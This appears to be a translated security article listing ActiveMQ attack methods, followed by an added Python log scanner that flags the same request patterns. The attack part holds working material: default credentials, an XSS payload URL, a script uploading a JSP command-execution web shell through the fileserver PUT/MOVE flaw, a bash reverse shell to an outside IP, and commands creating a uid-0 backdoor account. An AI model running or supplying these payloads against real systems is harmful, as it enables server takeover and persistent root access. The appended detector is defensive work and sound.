ActiveMQ
Attack methods
Finding targets
Weak credentials
admin/admin
Unauthorized access
/admin/connections.jsp
Source code disclosure
http://www.example.com:8161//admin/index.jsp
http://www.example.com:8161//admin/queues.jsp
http://www.example.com:8161//admin/topics.jsp
XSS vulnerability
/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script>
Remote code execution vulnerability
import requests
url = "http://192.168.0.11:8161/fileserver/shell2.txt"
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'Cookie':'JSESSIONID=1gfll70wf7hfnbsmipaa6es3b'
}
payload = '''
<%@ page import="java.io.*" %>
<%
out.print("Hello</br>")
String strcmd = request.getParameter("cmd");
String line = null;
Process p = Runtime.getRuntime().exec(strcmd);
BufferedReader br =new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line = br.readLine()) != null) {
out.print(line+"</br>");
}
%>
'''
response = requests.put(url, headers=headers, data=payload)
status = response.status_code
# status_code is an int, so compare against 204 rather than the string "204"
if status == 204:
    print("PUT success!")
else:
    print("False,please again!")
MOVE /fileserver/shell.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/shell.jsp
Host: 192.168.0.11:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
Deserialization vulnerability
http://192.168.0.11:8161/admin/browse.jsp?JMSDestination=event
bash -i >& /dev/tcp/192.168.31.41/8080 0>&1
useradd -g root -s /bin/bash -u 10010 test //add the user test and put it in the root group
sed -i "s/test:x:10010/test:x:0/g" /etc/passwd //change the uid of test in passwd to 0
echo "test:sd123456" | chpasswd //set a password for the test user
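Added example, not part of the original article: a Python check that flags, in a web console access log, the request forms listed on this page (PUT/MOVE under /fileserver/, the doubled-slash /admin/*.jsp URLs, markup in feedType, and admin pages served with no authenticated user). It assumes NCSA-style request logging is enabled and that the third field records the authenticated user; the function names, labels and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed NCSA-style line: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]*\] "([A-Z]+) (\S+) [^"]*" (\d{3})')

def classify(user, method, target, status):
    """Return labels for one request against the ActiveMQ web console."""
    path = unquote(target)
    labels = []
    # PUT or MOVE on the fileserver application (the two requests shown above).
    if method in ("PUT", "MOVE") and path.startswith("/fileserver/"):
        labels.append("fileserver-write")
    # Doubled slash in front of /admin/*.jsp (the source-disclosure URL form).
    if re.match(r"/{2,}admin/[^?]*\.jsp", path):
        labels.append("double-slash-admin-jsp")
    # Angle brackets in queueBrowse's feedType parameter (the XSS URL form).
    if "/admin/queueBrowse/" in path and re.search(r"feedType=[^&]*[<>]", path):
        labels.append("feedtype-markup")
    # Admin page served with no authenticated user recorded in the log.
    if re.sub(r"/{2,}", "/", path).startswith("/admin/") and user == "-" and status == 200:
        labels.append("admin-without-user")
    return labels

def scan(lines):
    """Return (client, method, target, labels) for every flagged log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        client, user, method, target, status = m.groups()
        labels = classify(user, method, target, int(status))
        if labels:
            hits.append((client, method, target, labels))
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - admin [01/Jan/2024:10:00:00 +0000] "GET /admin/queues.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "PUT /fileserver/a.txt HTTP/1.1" 204 0',
    '198.51.100.7 - - [01/Jan/2024:10:01:05 +0000] "MOVE /fileserver/a.txt HTTP/1.1" 204 0',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET //admin/index.jsp HTTP/1.1" 200 900',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /admin/queueBrowse/example.A?view=rss&feedType=%3Cscript%3E HTTP/1.1" 200 300',
    '198.51.100.7 - - [01/Jan/2024:10:04:00 +0000] "GET /admin/connections.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "fileserver-write" hit with a 2xx status is the one to triage first, since it means the server accepted the write or move.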
This article was first published on the WeChat official account 合天网安实验室: ActiveMQ Vulnerability Summary